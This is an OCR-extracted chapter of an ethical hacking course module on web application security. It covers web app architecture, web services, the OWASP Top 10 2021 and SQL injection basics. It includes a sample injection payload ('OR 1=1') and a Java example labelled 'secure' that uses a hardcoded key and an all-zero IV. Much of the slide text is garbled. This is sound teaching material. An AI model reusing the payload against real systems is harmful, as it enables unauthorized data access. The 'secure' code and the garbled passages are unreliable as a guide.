Learning Objectives The evolution of the Internet and web technologies, combined with rapidly increasing Internet connectivity, has led to the emergence of a new business landscape. Web applications are an integral component of online businesses. Everyone connected via the Internet is using various web applications for different purposes, including online shopping, email, chats, and social networking. Web applications are becoming increasingly vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications and web attack vectors as well as how to protect an organization’s information resources from them. It describes the general web application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization’s security against web application attacks. This module will also familiarize you with web API, webhooks, and web shell concepts as well as hacking. In addition, it discusses several tools that are useful in different stages of web application security assessment. At the end of this module, you will be able to: =

Describe web application concepts

=

Perform various web application attacks

=

Describe the web application hacking methodology

=

Use different web application hacking tools

=

Explain web API, webhooks, and web shell concepts

=

Understand how to hack web applications via web API, webhooks, and web shells

Module 14 Page 1881

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

=

Adopt countermeasures against web application attacks

=

Use different web application security testing tools

Module 14 Page 1882

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

CEH LO#01: Summarize Web Application Concepts

Copyright © by

Web Application Concepts This section describes the basic concepts associated with web applications vis-a-vis security concerns—their components, how they work, their architecture, and so on. Furthermore, it provides insights into web services and vulnerability stacks.

Module 14 Page 1883

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Introduction to Web Applications

CE H

@ Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser @ Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, and session hijacking

]

ane! User

How Web Applications Work

tp: eeriedhacker.

Login Form OS system calls

Operating System * from news where id = 6329 Copyright © by

A

served. Reproduction is Sticty Prohibited.

Introduction to Web Applications Web applications are software programs that run on web browsers and act as the interface between users and web servers through web pages. They enable the users to request, submit, and retrieve data to/from a database over the Internet by interacting through a user-friendly graphical user interface (GUI). Users can input data via a keyboard, mouse, or touch interface depending on the device they are using to access the web application. Based on browsersupported programming languages such as JavaScript, HTML, and CSS, web applications work in combination with other programming languages such as SQL to access data from the databases.

Web applications are developed as dynamic web pages, and they allow users to communicate with servers using server-side scripts. They allow users to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. Furthermore, there are several desktop applications that provide users with the flexibility to work with the Internet. Entities develop various web applications to offer their services to users via the Internet. Whenever users need to access such services, they can request them by submitting the Uniform Resource Identifier (URI) or Uniform Resource Locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and displays it in the browser. Some popular web servers are Microsoft IIS, Apache HTTP Server, H20, LiteSpeed, Cherokee, etc.

Increasing Internet usage and expanding online businesses have accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business purposes is the multitude of features that they offer. Moreover, they are secure and relatively easy to develop. In addition, they offer better services than many computer-based software applications and are easy to install, maintain, and update. Module 14 Page 1884

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

The advantages of web applications are listed below: As they are independent of the operating troubleshooting are easy and cost-effective. They are accessible connection.

anytime

and

anywhere

system,

using

a

their

development

computer

with

an

and

Internet

The user interface is customizable, making it easy to update. Users can access them smartphones, etc.

on

any

device

having

an

Internet

browser,

including

PDAs,

Dedicated servers, monitored and managed by experienced server administrators, store all the web application data, allowing developers to increase their workload capacity. Multiple locations of servers not only increase physical security but also reduce the burden of monitoring thousands of desktops using the program. They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, .NET, and scripting languages, which are scalable and support even portable platforms.

Although web applications enforce certain security policies, they are vulnerable attacks such as SQL injection, cross-site scripting, and session hijacking.

to various

How Web Applications Work The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser. This mechanism involves the following steps: First, the user enters the website name or URL in the browser. Then, the user's request is sent to the web server. On receiving the request, the web server checks the file extension:

o

If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.

o

If the user requests a web page with an extension that needs to be processed at the server side, such as php, asp, and cfm, then the web application server must process the request.

Therefore, the web server passes the which processes the user’s request.

user's request to the web

application

server,

The web application server then accesses the database to perform the requested task by updating or retrieving the information stored on it. After processing the request, the web application server finally sends the results to the web server, which in turn sends the results to the user's browser.

Module 14 Page 1885

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

User — Login Form

Internet

Firewall

Web Server

Operating System 1D 6329

Topic | Tech

SELECT * from news where id = 6329

Figure 14.1: Working of web applications

Web Application Architecture Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of

the web application depends on its architecture, which includes hardware and software that perform tasks such as reading the request as well as searching, gathering, and displaying the required data. The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It consists

of three layers: 1.

Client or presentation layer

2.

Business logic layer

3.

Database layer

The client or presentation layer includes all physical devices present on the client side, such as laptops, smartphones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server then responds to the request and fetches the requested data; the application finally displays this response in the browser in the form of a web page. The “business logic” layer itself consists of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component, e.g., a server. The firewall offers security to the content, the HTTP request parser handles requests coming from clients and forwards responses to them, and the resource handler is capable of handling multiple requests simultaneously. The webserver logic layer contains code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).

Module 14 Page 1886

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and “middleware”. It defines the flow of data, according to which the developer builds the application using programming languages. It stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database. This layer contains the software and defines the steps to search and fetch the data. The database layer consists of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization’s production data in a structured form (e.g., MS SQL Server, MySQL server).

Figure 14.2: Web Application Architecture

Module 14 Page 1887

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Web Services

clEH

@ Aweb service is an application or software that is deployed over the Internet and uses standard messaging protocols such as SOAP, UDDI, WSDL, and REST to enable communication

platforms

Types of Web Services ‘|G

applications developed for different

Web Service Architecture

SOAP web services

© tis basedon the XML format andis

-

used to transfer data between a service

provider and requestor

(G

between

Service Registry (Contains Service

Descriptions)

RESTful web services

©

Itis basedona

set of constraints using

underlying HTTP concepts to improve performance

aay

Service

Requester

Service Provider

(Contains Service and

Service Descriptions)

Web Services Aweb service is an application or software that is deployed over the Internet. It uses a standard messaging protocol (such as SOAP) to enable communication between applications developed on different platforms. For instance, Java-based services can interact with PHP applications. These web-based applications are integrated with SOAP, UDDI, WSDL, and REST across the network. Web Service Architecture A web service architecture describes the interactions among the service provider, service requester, and service registry. These interactions consist of three operations, namely publish,

find, and bind. All these roles and operations work together on web service artifacts known as software modules (services) and their descriptions. Service providers offer web services. They deploy and publish service descriptions of a web service to a service registry. Requesters find these descriptions from the service registry and use them to bind with the web service provider and invoke the web service implementation. There are three roles in a web service: =

Service Provider: It is a platform from where services are provided.

=

Service Requester: It is an application or client that is seeking a service or trying to establish communication with a service. In general, the browser is a requester, which invokes the service on behalf of a user.

=

Service Registry: It is the place where service requester discovers the service descriptions.

Module 14 Page 1888

the provider loads service descriptions. The and retrieves binding data from the service

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

There are three operations in a web service architecture: =

Publish: During this operation, service descriptions are published to allow the requester to discover the services.

=

Find: During this operation, the requester tries to obtain the service descriptions. This operation can be processed in two different phases: obtaining the service interface description at development time and obtain the binding and location description calls at run time.

=

Bind: During this operation, the requester calls and establishes communication with the services during run time, using binding data inside the service descriptions to locate and invoke the services.

There are two artifacts in a web service architecture: =

Service: It is a software module offered by the service provider over the Internet. It communicates with the requesters. At times, it can also serve as a requester, invoking other services in its implementation.

=

Service Description: It provides interface details and service implementation details. It consists of all the operations, network locations, binding details, datatypes, etc. It can be stored in a registry and invoked by the requester.

al b=). Service Registry (Contains Service Descriptions)

Service

Service Provider (Contains Service and

Requester

Service Descriptions) Figure 14.3: Web Service Architecture

Characteristics of Web Services =

XML-based: Web services use XML for data representation and transportation. XML usage can avoid OS, networking, or platform binding. Applications that provide web services are highly interoperable.

=

Coarse-grained service: In web services, some objects contain a massive amount of information and offer greater functionality than fine-grained services. A coarse-grained service is a combination of multiple fine-grained services.

Module 14 Page 1889

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

=

Loosely coupled: Web services support a loosely coupled approach for interconnecting systems. The interaction between the systems can occur via the web API by sending XML messages. The web API incorporates a layer of abstraction for the infrastructure to make the connection flexible and adaptable.

=

Asynchronous and synchronous support: Synchronous services are called by users who wait for a response, whereas asynchronous services are called by users who do not wait for a response. RPC-based messages and document-based messages are often used for synchronous and asynchronous web services. Synchronous and asynchronous endpoints are implemented using servlets, SOAP/XML, and HTTP.

=

RPC support: Web services support remote procedure calls (RPC) similarly to traditional applications.

Types of Web Services

Web services are of two types: =

SOAP web services The Simple Object Access Protocol (SOAP) defines the XML format. XML is used to transfer data between the service provider and the requester. It also determines the procedure to build web services and enables data exchange between different

programming languages.

=

RESTful web services REpresentational State Transfer (RESTful) web services are designed to make services more productive. They use many underlying HTTP concepts to define services. It is an architectural approach rather than a protocol like SOAP.

the the

Components of Web Service Architecture:

=

UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available.

=

WSDL: Web Services Description Language is an XML-based language that describes and traces web services.

=

WS-Security: Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.

There are other important features/components of the web service architecture, such as WSWork Processes, WS-Policy, and WS Security Policy, which play an important role in communication between applications.

Module 14 Page 1890

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

Vulnerability Stack

CEH Business Logic Flaws Technical Vulnerabilities

Third-party Components Web Server

Open Source / Commercial

j

che/ Microsoft IIS

Database

/ Ms sau

Operating System

Windows /Linux/ macOS

Network

/ Switch

Security

IPS / IDS

Layer1.

Vulnerability Stack One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each layer enable the user to access the web application securely. When considering web applications, the organization considers security as a critical component because web applications are major sources of attacks. The vulnerability stack shows various layers and the corresponding elements/mechanisms/services that make web applications vulnerable.

Coston lee eee

EB)

Third-party Components

ayer Layer 6

mg

Business Logic Flaws

r )

Technical Vulnerabilities

GS)

Open Source / Commercial

Web Server

Apache / Microsoft IIS

Database

Oracle / MySQL / Ms SQL

Operating System



Security

gz

ers

(0,0)

Windows / Linux / macOS

oer" a

A

IPs / IDS

Layer1

Figure 14.4: Vulnerability Stack

Module 14 Page 1891

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

Attackers exploit the vulnerabilities of one or more elements among the seven levels to gain unrestricted access to an application or the entire network.

Layer 7 If an attacker finds vulnerabilities in the business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS. Layer 6 Third-party components are services that integrate with the website to achieve certain functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website). When customers choose a product to buy, they click on the Buy/Checkout button. This redirects them to their online banking account through a payment gateway. Third-party websites such as citrix.com offer such payment gateways. Attackers might exploit such redirection and use it as a medium/pathway to enter Amazon.com and exploit it.

Layer5 Web servers are software programs that host websites. When users access a website, they send a URL request to the web server. The server parses this request and responds with a web page that appears in the browser. Attackers can perform footprinting on a web server that hosts the target website and grab banners that contain information such as the web server name and its version. They can also use tools such as Nmap to gather such information. Then, they might start searching for published vulnerabilities in the CVE database for that particular web server or service version number and exploit any that they find.

Layer 4 Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. There could be vulnerabilities in the database of the target website. These vulnerabilities can be exploited by attackers using tools such as sqlmap to gain control of the target’s database.

Layer 3 Attackers scan an operating system to find open ports and vulnerabilities, and they develop viruses/backdoors to exploit them. They send malware through the open ports to the target machine; by running such malware, they can compromise the machine and gain control over it. Later, they try to access the databases of the target website. Layer 2

Routers/switches route network traffic only to specific machines. Attackers flood these switches with numerous requests that exhaust the CAM table, causing it to behave like a hub. Then, they focus on the target website by sniffing data (in the network), which can include credentials or other personal information.

Module 14 Page 1892

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Hacking Web Applications

=

Exam 312-50 Certified Ethical Hacker

Layer1 IDS and IPS raise alarms if any malicious traffic enters a target machine or server. Attackers adopt evasion techniques to circumvent such systems so that they do not trigger any alarm while exploiting the target.

Module 14 Page 1893

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

CEH LO#02: Demonstrate Web Application Threats

Copyright © by

Web Application Threats Attackers attempt various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses the various types of threats and attacks against the vulnerabilities of web applications.

Module 14 Page 1894

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

OWASP Top 10 Application Security Risks - 2021

CEH

AOG6

Vulnerable and Outdated

O02 — Cryptographic Failures

AOZ

Identification and Authentication

A03

Injection

A08

04

Insecure Design

AQ1

AOS

Broken Access Control

Security Misconfiguration

0g

AlO

Components

failures

Software and Data Integrity Failures Security Logging and Monitoring Failures Server-Side Request Forgery (SSRF)

ps /fowasp 79 erved. Reproduction i Stcty Prohiated

OWASP Top 10 Application Security Risks - 2021 Source: https://owasp.org OWASP is an international organization that maintains a list of the top 10 vulnerabilities and flaws of web applications. The latest OWASP top 10 application security risks are as follows. =

A01- Broken Access Control This vulnerability is related to improperly enforced restrictions on the actions of authenticated users. Attackers can exploit these flaws to access unauthorized functionality and/or data such as access to other user accounts, viewing of sensitive files, modifications to other user data, and changes to access rights.

=

A02 - Cryptographic Failures Many web applications and APIs do not properly protect sensitive data, such as financial data, healthcare data, and personally identifiable information (PII). Moreover, many application developers fail to implement strong cryptographic keys, use old keys, or fail to enforce proper key management. In such cases, sensitive data can be transmitted in cleartext through HTTP. Attackers can leverage this flaw to steal or modify such weakly protected data to perform credit-card fraud, identity theft, or other crimes. Sensitive data require extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with a browser.

=

A03 — Injection Injection flaws, such as SQL command injection and LDAP injection, occur when untrusted data are sent to an interpreter as part of a command or query. The attacker’s

Module 14 Page 1895

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. =

A04- Insecure Design

During application development, if security controls are not properly implemented considering the latest business risks, various design flaws may occur. These design flaws can compromise the integrity, confidentiality, and authenticity of data. Attackers can exploit these flaws to perform session hijacking, credential theft, spoofing, and other types of MITM attacks. =

A05 - Security Misconfiguration Security misconfiguration is the most common issue in web security, which is due in part to manual or ad hoc configuration (or no configuration at all); insecure default configurations; open S3 buckets; misconfigured HTTP headers; error messages containing sensitive information; and failure to patch or upgrade systems, frameworks, dependencies, and components in a timely manner (or at all). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, or DoS attacks such as the billion laughs attack.

=

A06- Vulnerable and Outdated Components Components such as libraries, frameworks, and other software modules run with the same privileges as the application. The software components need to be updated or patched in a timely manner based on the current risks, failing which they can leave serious vulnerabilities as they become outdated. An attack exploiting a vulnerable component can cause serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

=

A07 - Identification and Authentication Failures Application functions related to identification, authentication and session management are often implemented incorrectly, allowing attackers to launch brute-forcing, password spraying, and other automated attacks to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume the identities of other users (temporarily or permanently).

=

A08 — Software and Data Integrity Failures Many applications are implemented with auto-update features. Such applications may download updates from unauthorized or previously trusted sources without conducting sufficient integrity checks. Attackers can take advantage of this flaw and load their own updates to distribute malware. Moreover, if data are encoded or serialized into an easily understandable format, attackers can alter the data, leading to an insecure deserialization flaw.

Module 14 Page 1896

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications =

Exam 312-50 Certified Ethical Hacker

A09 — Security Logging and Monitoring Failures Security logging and monitoring failures occur via insufficient log monitoring, the local storage of logs, inadequate error messages, inappropriate alert mechanisms for failedlogin attempts, or applications failing to identify threats in advance. Such vulnerabilities can leak sensitive information that can be leveraged by the attackers to compromise a system or account, tamper with credentials, or destroy data.

=

A10- Server-Side Request Forgery (SSRF) Server-Side Request Forgery (SSRF) is a web security vulnerability that arises when remote resources are obtained by an application without verifying the URL entered by the user. Attackers leverage this vulnerability to abuse the functionalities of a server to read or modify internal resources and steal sensitive information by sending malicious requests. SSRF vulnerabilities also allow attackers to send malicious requests to internal systems, even if they are secured by firewalls..

Module 14 Page 1897

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

A0O1 - Broken Access Control

CE H

@ Access control refers to how a web application grants access to its content and functions for some privileged users and restricts others

@ Broken access control is a method in which an attacker identifies a flaw related to access control and bypasses the authentication, which allows them to compromise the network

@ Itallows an attackerto act as users or administrators with privileged functions and create, access, update or delete every record

‘Access Control

Web Application

Copyright © by

A01 - Broken Access Control Access control refers to how a web application grants access to create, update, and delete any record/content or function to some privileged users while restricting access to other users. Broken access control is a method by which an attacker identifies a flaw related to access control, bypasses the authentication, and then compromises the network. Access control weaknesses are common because of the lack of automated detection and effective functional testing by application developers. They allow attackers to act as users or administrators with privileged functions and create, access, update, or delete any record. According to OWASP control are as follows:

2021

R3

revision, the common

vulnerabilities

associated

with

access

=

Abusing the least privileges or denying it by default, where everyone gains access to the roles, users, or abilities instead of having specific accessibility.

=

Evading the filtering of access controls by changing the URL, API request, an HTML page, or the application state via parameter tampering, force browsing, or any attacking tool .

=

Gaining permission identifier.

=

Gaining access to the APIs without the access controls for PUT, POST, and DELETE.

=

Escalating privileges, where a user can act as an administrator after logging in.

=

Manipulating the metadata; for example, the manipulation of a hidden field or alteration of a JSON Web Token (JWT) access-control token or a cookie for exploiting JWT invalidation or elevating privileges.

Module 14 Page 1898

to

read

or

modify

someone’s

account

through

their

unique

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

=

Accessing API via illegitimate sources exploiting cross-origin misconfiguration .

=

Force browsing respectively.

=) ror

to

privileged

Request

or

authentic

pages

as

a

resource sharing (CORS) valid

or

an

invalid

user,

Request

Privileged users Web Application

Access Control Access Denied

Figure 14.5: Broken access-control attack

Module 14 Page 1899

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

A02 — Cryptographic Failures/Sensitive Data Exposure @ Many web applications do not properly protect their sensitive data from unauthorized users @ Sensitive data exposure occurs due to flaws like insecure cryptographic storage and information leakage @ When an application uses poorly written encryption code to securely encrypt and store sensitive data in the database, an attacker can exploit this flaw and steal or modify weakly protected sensitive data such as credit cards numbers, SSNs, and other authentication credentials

Vulnerable Code

public String encrypt (String plaintext) { y; plainvext = plaintext .replace ( plainText = plaintext .replace ( return Base64Encoder. encode (plaintext); }

CE H

Secure Code

private static String sey = "zoccccccccom! private static String salt = Yooohhhhhhhhhhh! 1 1"; public static String encrypt (String plainText) { bytel] iv= { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 09; IvParameterspec ivspec = new IvParameterSpec (iv); SecretKeyFactory factory = new Secre tKey Fact ory. get Instance ("PSKDE2Wi thiimacSHA256") ; KeySpec = now PEEXeySpec (sKey.toCharArray(), salt.getBytes(), 65536, 256);

SecretKey key = factory.generatesecret (keyspec) ; SecretKeySpec secretKey = new SecretKeySpec (key.gatEncoded() , "AES")

Cipher = Cigar. getmntanon ("aRA/CRC/ MRCREPedding") 7 cipher.init (Cipher. ENCRYPT MODE, secretKey, ivspec); byte[] utsBtext = plaintext.getBytes (*UTF-8”) ; byte(] enryptediext = cipher.doFinal (utfatext) ; return Base6tEncoder. encodeToString(encryptedText) ; )

A02 - Cryptographic Failures/Sensitive Data Exposure Web applications need to store sensitive information such as passwords, credit-card numbers, account records, and other authentication information in a database or on a file system. If users do not maintain the proper security of their storage locations, the application may be at risk as attackers can access the storage and misuse the information. Many web applications do not properly protect their sensitive data from unauthorized users. Web applications use cryptographic algorithms to encrypt data and other sensitive information that they need to transfer from the server to the client or vice versa. Sensitive data exposure occurs because of flaws such as insecure cryptographic storage and information leakage. Although the data are encrypted, some cryptographic encryption methods have inherent weaknesses that allow attackers to exploit and steal the data. When an application uses poorly written encryption code to encrypt and store sensitive data in a database, the attacker can easily exploit this flaw to steal or modify weakly protected sensitive data such as credit-cards numbers,

SSNs,

and

other

authentication

credentials.

Thus,

they

can

launch

further

attacks

such as identity theft and credit-card fraud. Developers can avoid such attacks using algorithms to encrypt sensitive data. At the same time, developers must take precautions to store cryptographic keys securely. If these keys are stored at insecure locations, then attackers can retrieve them easily and decrypt the sensitive data. The insecure storage of keys, certificates, and passwords also allows the attacker to gain access to the web application as a legitimate user. Furthermore, developers must check the randomness of the initialization vectors (IVs) used in the encryption algorithms. Developers should ensure that the IVs are not reused and are generated using secure cipher modes of operation. Moreover, developers must avoid using deprecated hash functions such as MD5 and SHA-1 and deprecated padding methods such as PKCS 1/1.5. Cryptographic failures can cause Module 14 Page 1900

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

severe losses to a company. Hence, organizations must protect all their resources such as systems or other network resources from information leakage by employing proper contentfiltering mechanisms. Additionally, organizations should ensure that cryptographic error messages and side-channel information do not leave any clue for exploitation. The screenshots below show poorly encrypted vulnerable code and secure code that is properly encrypted using a secure cryptographic algorithm, respectively.

Vulnerable public

String

encrypt

Code

(String

plainText)

{

plainText

= plainText.replace(“a”,”z”)

;

plainText

= plainText.replace(“b”,”y”)

;

return

Base64Encoder.encode(plainText) ;

}

Figure 14.6: Vulnerable code example

Secure Code private

static String sKey = “zoooocccccom! !!!";

private

static String salt = “ooohhhhhhhhhhh!!!!";

public static String encrypt (String plainText) byte[]

{

iv = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };

IvParameterSpec

ivspec = new IvParameterSpec (iv) ;

SecretKeyFactory factory = new SecretKeyFactory .get Instance ("PBKDF2Wi thHmacSHA256") ; KeySpec

65536,

= new

256);

PBEKeySpec(sKey.toCharArray(),

SecretKey key = factory.generateSecret SecretKeySpec "AES") ; Cipher

secretKey

salt.getBytes(),

(keySpec) ;

= new SecretKeySpec (key .getEncoded() ,

= Cipher.getInstance

("AES/CBC/PKCS5Padding")

cipher. init (Cipher.ENCRYPT MODE, secretKey,

;

ivspec) ;

byte[]

ut£8text = plainText.getBytes (“UTF-8”) ;

byte[]

enryptedText = cipher.doFinal (utf8text) ;

return

Base64Encoder.encodeToString(encryptedText) ;

}

Figure 14.7: Secure code example

Module 14 Page 1901

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

A03 - Injection Flaws

clEH

@ Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of acommand or query @ Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access @ Injection flaws are prevalentin legacy code, often found in SQL, LDAP, XPath queries, and so on and can be easily discovered by application vulnerability scanners and fuzzers

SQL Injection

| @ Itinvolves the injection of malicious SQL queries into user input forms

Command

7 woe @ It involves the bpiacti, injection of malicious code through a web application u 8 PP

Injection

|

LDAP Injection

| @ Itinvolves the injection of malicious LDAP statements

Gross-Site Scripting (XXS)

|

| aie 5 al

oe

it involves the injection and execution of malicious scripts in the web browser eo

A03 - Injection Flaws Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Such flaws are prevalent in legacy code and often found in SQL, LDAP, and XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers. Attackers inject malicious code, commands, or scripts in the input gates of flawed web applications such that the applications interpret and run the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below: =

SQL Injection: SQL injection is the most common website vulnerability on the Internet, and it is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.

=

Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting a malicious command in the application to execute supplied arbitrary commands on the host operating system. Thus, such flaws are extremely dangerous.

=

LDAP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an

Module 14 Page 1902

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

application fails to sanitize the user input, the attacker modifies the LDAP statement with the help of a local proxy. This, in turn, results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree. =

Cross-Site Scripting (XSS) XSS flaws occur when an application includes untrusted data in a new web page without proper validation or escaping, or when an application updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to inject and execute scripts in the victim’s browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.

Module 14 Page 1903

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

SQL Injection Attacks

cE H

@ SQL injection attacks use a seriesof malicious SQL queries to directly manipulate the database @ Anattacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data @ SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

o

01 | SQL injection vulnerable server code

Note: For complete coverage of SQL Injection concepts and techniques, referto Module 15: SQL Injection

SQL Injection Attacks SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users, validate roles and access levels, store and retrieve information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate the input before passing it to an SQL statement. For example, consider the following SQL statement: SELECT

*

FROM

tablename

WHERE

UserID=

2302

becomes the following with a simple SQL injection attack: SELECT

*

FROM

tablename

WHERE

UserID=

2302

OR

1=1

The expression “OR 1=1” evaluates to the value “TRUE,” often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. Attackers carry out SQL injection attacks from the web browser’s address bar, form fields, queries, searches, and so on. SQL injection attacks allow attackers to

=

Log into the application without supplying valid credentials

=

Perform queries against data in the database, often even data to which the application would not normally have access

=

Modify database contents or drop the database altogether

=

Use the trust relationships established between access other databases

Module 14 Page 1904

the web application components to

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Applications

Exam 312-50 Certified Ethical Hacker

01 |